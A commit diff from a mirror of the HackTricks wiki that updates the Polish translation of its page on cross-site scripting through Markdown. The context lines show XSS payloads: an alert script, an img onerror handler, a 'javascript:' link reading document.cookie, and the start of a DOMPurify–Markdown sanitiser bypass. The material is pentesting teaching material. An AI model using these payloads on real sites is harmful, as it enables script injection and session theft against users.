maride/hacktricks
1
0
Fork 0
mirror of https://github.com/HackTricks-wiki/hacktricks.git synced 2025-10-10 18:36:50 +00:00
Code Issues Packages Projects Releases Wiki Activity

Translated ['src/pentesting-web/xss-cross-site-scripting/xss-in-markdown

Browse Source
This commit is contained in:
Translator 2025-01-26 09:38:13 +00:00
parent e9cf9ff639
commit 6816c29234
1 changed files with 2 additions and 2 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

4
src/pentesting-web/xss-cross-site-scripting/xss-in-markdown.md
View File

@ -14,7 +14,7 @@ alert(1)
</script> </script>
<img src="x" onerror="alert(1)" /> <img src="x" onerror="alert(1)" />
``` ```
Możesz znaleźć więcej przykładów na [głównej stronie XSS hacktricks](). Możesz znaleźć więcej przykładów na [głównej stronie XSS hacktricks](README.md).
### Linki Javascript ### Linki Javascript
@ -42,7 +42,7 @@ t:prompt(document.cookie))
``` ```
### HTML Sanitiser Markdown Bypass ### HTML Sanitiser Markdown Bypass
Następujący kod **sanitizuje dane wejściowe HTML** i następnie **przekazuje je do parsera markdown**, a następnie XSS może być wywołane poprzez nadużycie błędnych interpretacji między Markdown a DOMPurify Następujący kod **sanitizuje dane wejściowe HTML** i następnie **przekazuje je do parsera markdown**, a następnie XSS może być wyzwolony poprzez nadużywanie błędnych interpretacji między Markdown a DOMPurify
```html ```html
<!--from https://infosecwriteups.com/clique-writeup-%C3%A5ngstromctf-2022-e7ae871eaa0e --> <!--from https://infosecwriteups.com/clique-writeup-%C3%A5ngstromctf-2022-e7ae871eaa0e -->
<script src="https://cdn.jsdelivr.net/npm/dompurify@2.3.6/dist/purify.min.js"></script> <script src="https://cdn.jsdelivr.net/npm/dompurify@2.3.6/dist/purify.min.js"></script>